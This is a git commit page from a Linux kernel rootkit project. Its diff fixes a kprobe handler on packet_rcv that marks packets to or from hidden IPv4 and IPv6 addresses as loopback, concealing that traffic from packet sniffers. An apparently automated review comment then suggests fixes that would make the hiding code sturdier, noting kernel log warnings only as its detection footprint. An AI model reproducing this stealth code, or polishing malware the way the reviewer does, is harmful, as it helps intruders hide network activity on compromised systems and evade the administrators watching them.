linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 47908e222b904b0b631c42fed77d1dd0752aa427
parent 52c256e87c0f24839b44d8741f07e3e5aed98c9e
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 20 Dec 2020 01:05:47 +0100

Working packet hiding

Diffstat:
Msrc/packhide.c | 20+++++++++++---------
1 file changed, 11 insertions(+), 9 deletions(-)

diff --git a/src/packhide.c b/src/packhide.c
@@ -116,24 +116,26 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
 char *data = skb_network_header(skb);
 char ver = data[0];
+ ver &= 0xf0;
+
 struct sk_buff *clone = skb_clone(skb, GFP_KERNEL);
 pt_regs->di = (long unsigned int)clone;
- if ((ver & 0x40)) {
- struct iphdr *iphdr;
-
- iphdr = ip_hdr(clone);
-
- if (list_contains_ip(&hidden_ips, (u8 *)&iphdr->saddr, v4)
- || list_contains_ip(&hidden_ips, (u8 *)&iphdr->daddr, v4))
- clone->pkt_type = PACKET_LOOPBACK;
- } else if ((ver & 0x60)) {
+ if ((ver == 0x60)) {
 struct ipv6hdr *iphdr;
 iphdr = ipv6_hdr(clone);
 if (list_contains_ip(&hidden_ips, (u8 *)&iphdr->saddr, v6)
 || list_contains_ip(&hidden_ips, (u8 *)&iphdr->daddr, v6))
+ clone->pkt_type = PACKET_LOOPBACK;
+ } else if ((ver == 0x40)) {
+ struct iphdr *iphdr;
+
+ iphdr = ip_hdr(clone);
+
+ if (list_contains_ip(&hidden_ips, (u8 *)&iphdr->saddr, v4)
+ || list_contains_ip(&hidden_ips, (u8 *)&iphdr->daddr, v4))
 clone->pkt_type = PACKET_LOOPBACK;
 }
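Review bot: The added `iphdr = ipv6_hdr(clone);` and `iphdr = ip_hdr(clone);` lines dereference `clone` without checking that the `skb_clone()` on the context line above returned non-NULL, so an allocation failure turns into a NULL dereference inside the kprobe handler and an oops instead of a skipped packet. The clone also uses `GFP_KERNEL`, and packet_rcv is, as far as I can tell, reached from the receive softirq path, where a sleeping allocation is a sleep-in-atomic bug that the kernel reports to the log; from a detection standpoint, those warnings and oopses in dmesg are the observable footprint of this handler. The `ver == 0x60` / `ver == 0x40` comparisons are correct now that the high nibble is masked, but `ver` is a plain `char` (signed on x86) and nothing says why the mask is applied; a comment such as `/* keep only the IP version nibble: 0x40 = IPv4, 0x60 = IPv6 */` above `ver &= 0xf0;` would make the intent explicit. g7_packet_rcv starts before and ends after this hunk.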